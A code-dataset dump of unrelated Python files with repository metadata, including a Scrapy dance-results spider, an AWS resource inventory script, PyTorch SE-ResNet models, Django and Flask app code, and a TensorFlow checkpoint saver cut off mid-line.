yield Request(url=url, callback=self.parse_year_page)
def parse_year_page(self, response):
#now on the year page with different feis listed
feis_urls = response.xpath('//*[@id="box1"]/p[3]/a/@href').extract()
print('level 2')
for url in feis_urls:
print(url)
yield Request(url='http://www.feisresults.com/'+url, callback=self.parse_feis_page)
def parse_feis_page(self, response):
#now on page where all the competitions are listed
comp_urls = response.xpath('//*[@id="sidebar1"]/p/a/@href').extract()
print('level 3')
for url in comp_urls:
print('http://www.feisresults.com/'+url)
yield Request(url='http://www.feisresults.com/'+url, callback=self.parse_comp_page)
def parse_comp_page(self, response):
feis_yr = response.xpath('//span[@class="bluetext"]/text()').extract_first()
date = response.xpath('//span[@class="bluetext"]/text()[2]').extract_first()
year = date.split()[-1]
#month = date.split()[-2]
#days = ' '.join(date.split()[:-2])
feis = ' '.join(feis_yr.split()[:-1])
comp_name_ugly = response.xpath('//*[@id="box1"]/h3/text()').extract_first()
wq_wmh_str = response.xpath('//*[@id="box1"]/h3/span/text()').extract_first()
competition = ' '.join(comp_name_ugly.split(' ')[3:]).strip()
#print(feis, competition)
dancer_rows = response.xpath('//table/tr')
#dancer_rows.xpath('.//td[2]/text()').extract()
for dancer in dancer_rows[1:]:
name_wq_wmh = dancer.xpath('.//td[2]/text()').extract_first()
school_region = dancer.xpath('.//td[3]/text()').extract_first()
place = dancer.xpath('.//td[4]/text()').extract_first()
#Finds all alpha num hyphens, spaces, and apostrophes plus unicode for special letters.
pattern = "[ \-'\w\u00C0-\u00FF]+"
name = re.findall(pattern, name_wq_wmh)[0].strip()
if (('*' or '+') in name_wq_wmh) & ('world medal' in wq_wmh_str.lower()):
wq = 1
wmh = 1
elif (('*' or '+') in name_wq_wmh) & ('qualifier' in wq_wmh_str.lower()):
wq = 1
wmh = 0
elif (('*' or '+') not in name_wq_wmh) & ('world medal' in wq_wmh_str.lower()):
wq = 1
wmh = 0
else:
wq = 0
wmh = 0
if ':' in school_region:
school = school_region.split(':')[0].strip()
region = school_region.split(':')[1].strip()
else:
school = school_region
region = ' '.join(feis.split()[:-1]).replace('Oireachtas','').replace('Rince','').strip()
item = FeisresultsItem()
item['feis'] = feis
item['date'] = date
item['year'] = year
#item['month'] = month
#item['days'] = days
item['name'] = name
item['school'] = school
item['region'] = region
item['place'] = place
item['competition'] = competition
item['wq'] = wq
item['wmh'] = wmh
#processing: gender, categories: solo/group/ceili/dance_drama/choreo
#categories: world championship/secondary qualifier/primary qualifier/neither
#is it better to store these categories in the csv file or do it
#post-scraping?
#Get results from other secondary and primary competitions NOT listed there.
yield item
| [
"jonpresley@hotmail.com"
] | jonpresley@hotmail.com |
e4e76f59e2049ab070cf7cb4ab17e73d3742e4e4 | 3f9e05507195af59b44be45b5a600e56d6ccccf9 | /lucidchartmapper.py | f2f3a98bf471c9bd564e2e6d71b22a7243a4096c | [] | no_license | jonathanbglass/tips_n_tricks | d78ab5d9c736d998a4e985787a12987a46dec374 | dffcfeeeabab0f4b8c95505effef514fd6c64d53 | refs/heads/master | 2023-06-08T07:18:33.448678 | 2023-06-01T12:58:20 | 2023-06-01T12:58:20 | 187,048,486 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,538 | py | #!/usr/bin/env python2
import botocore.session
from datetime import datetime, tzinfo, timedelta
import json
from os import environ
#change region to match desired region
region = 'us-east-1'
class SimpleUtc(tzinfo):
def tzname(self):
return "UTC"
def utcoffset(self, dt):
return timedelta(0)
class DateTimeEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return o.utcnow().replace(tzinfo=SimpleUtc()).isoformat()
return json.JSONEncoder.default(self, o)
def clean_response(resp):
del resp['ResponseMetadata']
return resp
output = {}
if 'AWS_PROFILE' in environ:
session = botocore.session.Session(profile=environ['AWS_PROFILE'])
else:
session = botocore.session.get_session()
ec2 = session.create_client('ec2', region_name=region)
myregions = [thisregion['RegionName'] for thisregion in ec2.describe_regions()['Regions']]
print(myregions)
for region in myregions:
print("Checking Region: " + region)
try:
ec2 = session.create_client('ec2', region_name=region)
except:
continue
print("Executing ec2 describe-instances")
try:
output['ec2'] = clean_response(ec2.describe_instances())
except:
continue
print("Executing ec2 describe-security-groups")
try:
output['securitygroup'] = clean_response(ec2.describe_security_groups())
except:
continue
print("Executing ec2 describe-subnet")
try:
output['subnets'] = clean_response(ec2.describe_subnets())
except:
continue
print("Executing ec2 describe-network-acls")
try:
output['acls'] = clean_response(ec2.describe_network_acls())
except:
continue
print("Executing ec2 describe-vpcs")
try:
output['vpc'] = clean_response(ec2.describe_vpcs())
except:
continue
print("Executing ec2 describe-volumes")
try:
output['ebs'] = clean_response(ec2.describe_volumes())
except:
continue
print("Executing elb describe-load-balancers")
try:
output['elb'] = clean_response(session.create_client('elb', region_name=region).describe_load_balancers())
except:
continue
try:
elbv2 = session.create_client('elbv2', region_name=region)
except:
continue
output['elbv2'] = {}
output['elbv2']['TargetHealthDescriptions'] = {}
print("Executing elbv2 describe-load-balancers")
try:
output['elbv2']['LoadBalancers'] = elbv2.describe_load_balancers()['LoadBalancers']
except:
continue
print("Executing elbv2 describe-target-groups")
try:
output['elbv2']['TargetGroups'] = elbv2.describe_target_groups()['TargetGroups']
except:
continue
print("Executing elbv2 describe-target-health")
for target_group_arn in [target_group['TargetGroupArn'] for target_group in output['elbv2']['TargetGroups']]:
try:
output['elbv2']['TargetHealthDescriptions'][target_group_arn] = elbv2.describe_target_health(TargetGroupArn=target_group_arn)['TargetHealthDescriptions']
except:
continue
print("Executing autoscaling describe-auto-scaling-groups")
try:
output['autoscale'] = clean_response(session.create_client('autoscaling', region_name=region).describe_auto_scaling_groups())
except:
continue
print("Executing autoscaling describe-launch-configurations")
try:
output['launchconfig'] = clean_response(session.create_client('autoscaling', region_name=region).describe_launch_configurations())
except:
continue
print("Executing s3api list-buckets")
try:
output['s3buckets'] = clean_response(session.create_client('s3', region_name=region).list_buckets())
except:
continue
print("Executing rds describe-db-instances")
try:
output['rds'] = clean_response(session.create_client('rds', region_name=region).describe_db_instances())
except:
continue
print("Executing cloudfront describe-db-instances")
try:
output['cloudfront'] = clean_response(session.create_client('cloudfront', region_name=region).list_distributions())
except:
continue
print("Executing sns list-topics")
try:
sns = session.create_client('sns', region_name=region)
except:
continue
try:
topic_resp = sns.list_topics()
except:
continue
print("Executing sns get-topic-attributes")
try:
output['sns'] = [clean_response(sns.get_topic_attributes(TopicArn = t['TopicArn'])) for t in topic_resp.get('Topics',[])]
except:
continue
print("Executing sqs list-queues")
try:
sqs = session.create_client('sqs', region_name=region)
except:
continue
try:
queue_resp = sqs.list_queues()
except:
continue
print("Executing sqs get-queue-attributes")
try:
urls = queue_resp.get('QueueUrls',[])
except:
continue
try:
output['sqs'] = {'Queues': [clean_response(sqs.get_queue_attributes(AttributeNames=['All'], QueueUrl = url)) for url in urls]}
except:
continue
output['importMetaData'] = {'region': region, 'timeStamp': datetime.now()}
if 'AWS_PROFILE' in environ:
outfile = environ['AWS_PROFILE'] + "-" + region + '-aws.json'
else:
outfile = 'aws.json'
with open(outfile, 'w') as f:
json.dump(output, f, cls=DateTimeEncoder)
print("Output to " + outfile)
| [
"noreply@github.com"
] | jonathanbglass.noreply@github.com |
338112d113012bad8d01d8131743534483bf7067 | d32ef9fe4d58d873f6752f5c20c205682b7ac25a | /config/nvim/rplugin/python/log.py | 0bb616eea9ba46f4584b6100e315ebb564420547 | [] | no_license | alexeRadu/dotfiles | 555705fbfeabff5b4cd351df77aa5c4ca2161171 | ef86cc28841dbef27b0de5e6d7ed45f5cdd442cf | refs/heads/master | 2023-07-09T23:50:54.117391 | 2023-06-29T16:13:47 | 2023-06-29T16:13:47 | 94,201,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | import logging
def setup_logging():
logger = logging.getLogger("dbug")
handler = logging.FileHandler('/tmp/dbug.log', 'w')
handler.formatter = logging.Formatter('%(msecs)6d %(levelname)-5s %(message)s')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
| [
"alexeRadu2007@gmail.com"
] | alexeRadu2007@gmail.com |
9f635f6fa32ef161386cd71ad13f0caeb9e69192 | 419d6346d722589ecff72a33f2431775f9bf3dfa | /sampleCode/sample8/cities.py | 8453e6fb5a1129f1be656645813d88e7dec5d11d | [] | no_license | wzmf038827/pythonFlask | dc414c37322ace036a1b9858ce5626a59dcbda4e | 216db3c846ecc7a49c7f3cc7d1b15d6d3be7905a | refs/heads/master | 2023-04-11T17:44:52.093854 | 2021-05-03T06:06:11 | 2021-05-03T06:06:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | import os
import sqlite3
from flask_sqlalchemy import SQLAlchemy
from main import app
basePath = os.path.abspath(os.path.dirname(__file__))
cityPath = os.path.join(basePath, 'citys.db')
conn = sqlite3.connect(cityPath)
print('開啟資料庫成功')
c = conn.cursor()
cursor = c.execute("select * from city")
print(cursor.__class__)
citys = list(cursor)
print("select 成功")
conn.close()
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basePath,'citys.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class City(db.Model):
__tablename__ = 'city'
id = db.Column(db.Integer, primary_key=True)
cityName = db.Column(db.String(64), unique=True)
continent = db.Column(db.String(64), nullable=False)
country = db.Column(db.String(64), nullable=False)
image = db.Column(db.String(64), nullable=False)
description = db.Column(db.Text)
lat = db.Column(db.Float, nullable=False)
lon = db.Column(db.Float, nullable=False)
url = db.Column(db.String(256))
def getAllCities():
cityList = City.query.all()
print(cityList)
| [
"roberthsu2003@gmail.com"
] | roberthsu2003@gmail.com |
62fb1b678d57e03edcb9bcd14ab0a9da07e0aba3 | 014b6d3835623a67f99a1771848ddb6caed0e2be | /median_gamma.py | a105cfe37b0eaa5a15b1a98ebfa9bf91e6674cda | [] | no_license | alancarlosml/image-processing | 224e302a355edee1fe9d1bed9e989052e1675873 | 8c961a8df4c418f3df8a1e316874459cf19a95a4 | refs/heads/master | 2021-05-20T12:10:11.492535 | 2020-04-02T22:29:57 | 2020-04-02T22:29:57 | 252,289,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | from pathlib import Path
from os import walk
import numpy as np
import cv2
ABSOLUTE_PATH = Path.cwd()
print(ABSOLUTE_PATH)
def adjust_gamma(image, gamma=1.0):
# build a lookup table mapping the pixel values [0, 255] to
# their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
# apply gamma correction using the lookup table
return cv2.LUT(image, table)
files = []
for (dirpath, dirnames, filenames) in walk('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/'):
files.extend(filenames)
break
for f in files:
print('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/' + f)
image = cv2.imread('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/' + f)
# convert the YUV image back to RGB format
img_output = adjust_gamma(image, 0.5)
img_output = cv2.medianBlur(img_output, 5)
cv2.imwrite('F:/Alan/Documentos/Doutorado/Retina/images/median_gamma/test/' + f, img_output)
| [
"alancarlosml@gmail.com"
] | alancarlosml@gmail.com |
df079fe350a45a3d9ea55cd5f00955315a3cee40 | 13d2abaf860a27a51ed8b6748947b93b5f71772a | /run.py | 03aec13d10701b65d68e4b47cd2fda4bcf7d7451 | [
"MIT"
] | permissive | broden-wanner/party-parrot-bot | fc4c8acbd9b1649d23590c7c4bd411b380c9771b | c4733bec1794bd46ac6eac98c9131431363f096b | refs/heads/master | 2023-02-13T19:36:58.103136 | 2021-01-15T21:58:39 | 2021-01-15T21:58:39 | 327,184,940 | 1 | 0 | null | 2021-01-06T03:16:41 | 2021-01-06T03:07:31 | Python | UTF-8 | Python | false | false | 338 | py | import os, sys
from dotenv import load_dotenv
from client import bot
if __name__ == "__main__":
load_dotenv()
# Get the token
token = os.getenv('BOT_TOKEN')
if not token:
print("[ERROR] BOT_TOKEN environment variable not set. Add it do the .env file.")
sys.exit()
# Start the bot
bot.run(token)
| [
"broden.wanner@outlook.com"
] | broden.wanner@outlook.com |
a7c6313e7d96e4efb70302abea076553c2bc4427 | d9c1890cf137489fa24bf0419d565b1e1edbd2cd | /circus/web/server.py | 6d6a07d58bb2fade819c4a6daa5b3e13ab132590 | [
"MIT",
"Apache-2.0"
] | permissive | magopian/circus | 47f7b6fcab833eaec19af6e9822d769bc9dd5050 | e2eef7f008050c30e43d1a10d615dd920fb6583a | refs/heads/master | 2021-01-18T04:54:23.720743 | 2012-11-11T19:07:39 | 2012-11-11T19:07:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | import socket
from bottle import ServerAdapter
class SocketIOServer(ServerAdapter):
def __init__(self, host='127.0.0.1', port=8080, **config):
super(SocketIOServer, self).__init__(host, port, **config)
self.fd = config.get('fd')
if self.fd is not None:
self.fd = int(self.fd)
def run(self, handler):
try:
from socketio.server import SocketIOServer
except ImportError:
raise ImportError('You need to install gevent_socketio')
from gevent import monkey
from gevent_zeromq import monkey_patch
monkey.patch_all()
monkey_patch()
namespace = self.options.get('namespace', 'socket.io')
policy_server = self.options.get('policy_server', False)
if self.fd is not None:
sock = socket.fromfd(self.fd, socket.AF_INET, socket.SOCK_STREAM)
else:
sock = (self.host, self.port)
socket_server = SocketIOServer(sock, handler,
namespace=namespace,
policy_server=policy_server)
handler.socket_server = socket_server
socket_server.serve_forever()
| [
"tarek@ziade.org"
] | tarek@ziade.org |
fab7ec97a4393796b4ff21c55db026627eb1fade | f88ede2dc00e6bdbbc2a62e77f3f05ceedbe37db | /Cifar100_Squishmoid/models/Softmax.py | 22644964cce15b496deb3ca0b945ed3a9455af9f | [] | no_license | maramc17/Squishmoid | 334c16983633349f628bc8d6064f481c92f34d19 | 4d1e9e60ddd2efd04d4ce849ea4a60d1cedba40c | refs/heads/master | 2020-06-23T02:06:59.350880 | 2019-07-29T18:34:58 | 2019-07-29T18:34:58 | 198,470,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,049 | py | '''Pre-activation ResNet in PyTorch.
Reference:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Identity Mappings in Deep Residual Networks. arXiv:1603.05027
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
__all__ = ['SoftmaxSEResNet50']
# enlarge is the alpha of the softmax function, hoping to have the same reaction as sigmoid.
class SoftmaxSELayer(nn.Module):
def __init__(self, channel, reduction=16,enlarge =1): #englarge = alpha = 1
super(SoftmaxSELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.enlarge=enlarge
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction, bias=False),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel, bias=False)
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
# print((self.fc(100 * y) * c)[1, :])
y = (self.fc(y)*c).view(b, c, 1, 1)
y = F.softmax(y*self.enlarge, dim=1) # Softmax Activation Function.
return x * y.expand_as(x)
class PreActBlock(nn.Module):
'''Pre-activation version of the BasicBlock.'''
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(PreActBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.se = SoftmaxSELayer(planes*self.expansion)
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
out = F.relu(self.bn1(x))
shortcut = self.shortcut(out) if hasattr(self, 'shortcut') else x
out = self.conv1(out)
out = self.conv2(F.relu(self.bn2(out)))
# Add SE block
out = self.se(out)
out += shortcut
return out
class PreActBottleneck(nn.Module):
'''Pre-activation version of the original Bottleneck module.'''
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(PreActBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.se = SoftmaxSELayer(planes*self.expansion)
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
out = F.relu(self.bn1(x))
shortcut = self.shortcut(out) if hasattr(self, 'shortcut') else x
out = self.conv1(out)
out = self.conv2(F.relu(self.bn2(out)))
out = self.conv3(F.relu(self.bn3(out)))
# Add SE block
out = self.se(out)
out += shortcut
return out
class PreActResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=1000,init_weights=True):
super(PreActResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
if init_weights:
self._initialize_weights()
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
if hasattr(m, 'bias.data'):
m.bias.data.zero_()
def forward(self, x):
out = self.conv1(x)
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def SoftmaxSEResNet18(num_classes=1000):
return PreActResNet(PreActBlock, [2,2,2,2],num_classes)
def SoftmaxSEResNet34(num_classes=1000):
return PreActResNet(PreActBlock, [3,4,6,3],num_classes)
def SoftmaxSEResNet50(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,4,6,3],num_classes)
def SoftmaxSEResNet101(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,4,23,3],num_classes)
def SoftmaxSEResNet152(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,8,36,3],num_classes)
def test():
net = SoftmaxSEResNet50(num_classes=100)
y = net((torch.randn(10,3,32,32)))
print(y.size())
# test()
| [
"noreply@github.com"
] | maramc17.noreply@github.com |
534235bc309bf3d8aaee107daaf7605b10a93c80 | e29a67d4c67d81a90947934f795c1c4a1b6fc74d | /nikhil_chavan_prediction_model_task_5.py | 1217c0679ce764c1afcf4e2ae372d194a0d12607 | [] | no_license | Tinkerers-Lab-VESIT-ETRX/IoT-based-noise-pollution-monitoring-system-8 | 50a2b574fb0fd382615c781cb657b974cea72276 | 32ffa0c6e1567d434dda090345da2f82954a0b4e | refs/heads/main | 2023-06-11T16:07:26.730560 | 2021-07-12T18:18:12 | 2021-07-12T18:18:12 | 384,758,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,176 | py | # -*- coding: utf-8 -*-
"""Nikhil chavan Prediction Model Task 5.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Q18MKd6G7NIH0g2KbK9XTW5WpVabBksK
"""
from google.colab import drive
drive.mount ('/content/drive/')
!pip install -q keras
import keras
import pandas as pd
import numpy as np
# Commented out IPython magic to ensure Python compatibility.
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
df=pd.read_csv('/content/drive/MyDrive/city_data.csv')
df.head(5)
df.info()
df.describe()
#CORRELATION_ANALYSIS
sns.heatmap(df.corr(),annot=True)
d=df.groupby(['City'])[['AQI']].mean().sort_values(by='AQI',ascending=False).head(10)
newdf=d.reset_index('City')
newdf
plt.figure(figsize=(10,5))
sns.barplot(data=newdf,x='AQI',y='City',orient='h',palette='viridis')
ndf = df.head(10)
n=ndf.dropna(axis=1)
ndf=n.drop('Date',axis=1)
nndf=ndf.drop('City',axis=1)
nndf
sns.pairplot(nndf)
df.columns
df['Year'] = pd.DatetimeIndex(df['Date']).year
df['Month'] = pd.DatetimeIndex(df['Date']).month
ddf=df.groupby(['City','Year','Month'])[['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']].mean()
ndf=ddf.reset_index(['City','Year','Month'])
ndf.head
"""**Model**"""
X=nndf[[ 'NOx', 'SO2','O3', 'Benzene', 'Toluene', 'Xylene']]
y=ndf['AQI'].head(10)
"""**Train and Test**"""
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)
from sklearn.linear_model import LinearRegression
lm=LinearRegression()
lm.fit(X_train,y_train)
LinearRegression(copy_X=True, fit_intercept=True, n_jobs=None, normalize=False)
print(lm.intercept_)
lm.coef_
cdf=pd.DataFrame(lm.coef_,X.columns,columns=['Coeff'])
cdf
"""**Prediction**"""
predictions=lm.predict(X_test)
predictions
plt.scatter(y_test,predictions)
sns.distplot((y_test-predictions))
from sklearn import metrics
metrics.mean_absolute_error(y_test,predictions)
metrics.mean_squared_error(y_test,predictions)
np.sqrt(metrics.mean_squared_error(y_test,predictions))
"""**prediction task done**""" | [
"noreply@github.com"
] | Tinkerers-Lab-VESIT-ETRX.noreply@github.com |
4d952b651224199a592af47dc19fd9166eb94aa9 | 6e12c2e6d453ea1caf64c0eafaf3410b30f434e0 | /shop/migrations/0011_auto_20160607_1347.py | b6dc57869b17135e8c679bb3ac3d6d5cf83edca0 | [] | no_license | andreynovikov/django-shop | 43b66ec639037473cd72f7480f83811d911104fb | 8f843b0b15354903a335c324daa65714bfb2f8cc | refs/heads/master | 2023-04-28T01:26:16.938227 | 2023-04-22T15:33:29 | 2023-04-22T15:33:29 | 43,815,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('shop', '0010_manufacturer'),
]
operations = [
migrations.CreateModel(
name='Supplier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),
('name', models.CharField(verbose_name='название', max_length=100)),
],
options={
'verbose_name_plural': 'поставщики',
'verbose_name': 'поставщик',
},
),
migrations.AddField(
model_name='product',
name='manufacturer',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='shop.Manufacturer', verbose_name='Производитель', default=1),
preserve_default=False,
),
]
| [
"novikov@gmail.com"
] | novikov@gmail.com |
2ac600a2afbfa47e0fa79b2eb57c8e35a54d8048 | 2f6032d7f191b71f93f4bc178a2e753870e54ffd | /chapter6-类和对象/demo10-property装饰器.py | c1492f101fa248d130bb78134038f1d39c5a9773 | [] | no_license | mapleinsss/python-basic | 35606cbf4acbe49cbba8cf84caab2213c53da8a1 | 4d264694e3eda1d000626f4a47805cacbea12086 | refs/heads/master | 2023-01-14T01:36:38.673143 | 2020-11-24T15:36:58 | 2020-11-24T15:36:58 | 309,705,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | class Cell:
# 用 @property 修饰方法,相当于为该属性设置 getter 方法
@property
def state(self):
return self._state
@state.setter
def state(self, value):
if 'alive' in value.lower():
self._state = 'alive'
else:
self._state = 'dead'
@property
def is_dead(self):
return not self._state.lower() == 'alive'
c = Cell()
c.state = 'Alive'
print(c.state)
print(c.is_dead)
| [
"mapleins@aliyun.com"
] | mapleins@aliyun.com |
41e3f09609f0017ea4b0584225238b55a6cd1edd | be2ddc4d6dbca1dedd42b7b40704ef5ecf7d74cf | /studentg/redressal/committee_urls.py | 5671201ddd22250160037b398e2568f8c9e671d9 | [] | no_license | Saloni-000/KB220_TECHNOspired-1 | 4264a70e7219d6708aa84ce4c37bcaf61967ed8e | 708570764d15e46888f8a2fdb183352387535e03 | refs/heads/master | 2023-03-21T01:37:35.025566 | 2021-03-19T16:25:04 | 2021-03-19T16:25:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,484 | py | """studentg URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from accounts.views import SignupView
from django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView
from . import views
from studentg.views import overall_status_stats_chart
chartpatterns = [
path('', views.charts, name="charts"),
path('stats/status-chart/', views.status_stats_chart, name="status_stats_chart"),
path('stats/subcat-chart/', views.subcategory_stats_chart, name="subcat_stats_chart"),
path('stats/subcat-dependent-chart/', views.status_chart_for_subcategory, name="subcat_dependent_chart"),
path('rating-chart/', views.rating_bar_chart, name="rating_bar_chart"),
path('grievance-chart/', views.grievances_line_chart, name="grievance-chart"),
path('stats/overall-status-chart/', overall_status_stats_chart, name="overall_status_chart"),
]
dashpatterns = [
path('', views.DashboardView.as_view(), name="dashboard"),
path('all/grievances/', views.AllGrievances.as_view(), name="all_grievances"),
path('view/subcategories/', views.ViewSubcategories.as_view(), name="view_subcategories"),
path('view/grievance/<token>/', views.ViewGrievance.as_view(), name="view_grievance"),
path('view/members/', views.ViewMembers.as_view(), name="view_members"),
path('add/member/', views.AddMember.as_view(), name="add_member"),
path('remove/member/<pk>/', views.DeleteMember.as_view(), name="delete_member"),
path('remove/invited-member/<pk>/', views.DeleteInvitedMember.as_view(), name="delete_invited_member"),
path('view/bodies/', views.ViewBodies.as_view(), name="view_bodies"),
path('add/body/', views.AddBody.as_view(), name="add_body"),
path('remove/body/<pk>/', views.DeleteBody.as_view(), name="delete_body"),
path('view/students/', views.ViewStudents.as_view(), name="view_students"),
path('add/student/', views.AddStudent.as_view(), name="add_student"),
path('my/account/', PasswordChangeView.as_view(template_name="redressal/view_profile.html"),
name="password_change"),
path('settings/password/done/', PasswordChangeDoneView.as_view(template_name="redressal/password_change_done.html"),
name="password_change_done"),
path('charts/', include(chartpatterns)),
]
urlpatterns = [
path('', views.HomeView.as_view(), name="home"),
path('accounts/signup/<uidb64>/<token>/', SignupView.as_view(template_name="redressal/signup.html"), name='signup'),
path('accounts/', include('accounts.urls')),
path('dashboard/', include(dashpatterns)),
]
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"smartyaziz99@gmail.com"
] | smartyaziz99@gmail.com |
0c4bb10e987777fae9cc78ed90940998e95d1024 | 6805b5299355005536d7408a2092db5cdf7f78d3 | /utils/saver.py | 94ca9f01d939bba00e341c74d18af9c619879727 | [] | no_license | harisris/draw-mnist | 050609c9bcc3a1690836467179660af186d544a9 | 7cfaa76336714ec4c290d84243115b5184142768 | refs/heads/master | 2021-01-12T10:03:39.163704 | 2016-06-08T09:19:53 | 2016-06-08T09:19:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,863 | py | import cslab_environ
import fnmatch
import logger
import os
import yaml
import tensorflow as tf
kModelOptFilename = 'model_opt.yaml'
kDatasetOptFilename = 'dataset_opt.yaml'
kMaxToKeep = 2
class Saver():
def __init__(self, folder, model_opt=None, data_opt=None):
if not os.path.exists(folder):
os.makedirs(folder)
self.folder = folder
self.log = logger.get()
self.tf_saver = None
if model_opt is not None:
self.save_opt(os.path.join(folder, kModelOptFilename), model_opt)
if data_opt is not None:
self.save_opt(os.path.join(folder, kDatasetOptFilename), data_opt)
pass
def save(self, sess, global_step=None):
"""Save checkpoint.
Args:
global_step:
"""
if self.tf_saver is None:
self.tf_saver = tf.train.Saver(
tf.all_variables(), max_to_keep=kMaxToKeep)
ckpt_path = os.path.join(self.folder, 'model.ckpt')
self.log.info('Saving checkpoint to {}'.format(ckpt_path))
self.tf_saver.save(sess, ckpt_path, global_step=global_step)
pass
def save_opt(self, fname, opt):
with open(fname, 'w') as f:
yaml.dump(opt, f, default_flow_style=False)
def get_latest_ckpt(self):
"""Get the latest checkpoint filename in a folder."""
ckpt_fname_pattern = os.path.join(self.folder, 'model.ckpt-*')
ckpt_fname_list = []
for fname in os.listdir(self.folder):
fullname = os.path.join(self.folder, fname)
if fnmatch.fnmatch(fullname, ckpt_fname_pattern):
if not fullname.endswith('.meta'):
ckpt_fname_list.append(fullname)
if len(ckpt_fname_list) == 0:
raise Exception('No checkpoint file found.')
ckpt_fname_step = [int(fn.split('-')[-1]) for fn in ckpt_fname_list]
latest_step = max(ckpt_fname_step)
latest_ckpt = os.path.join(self.folder,
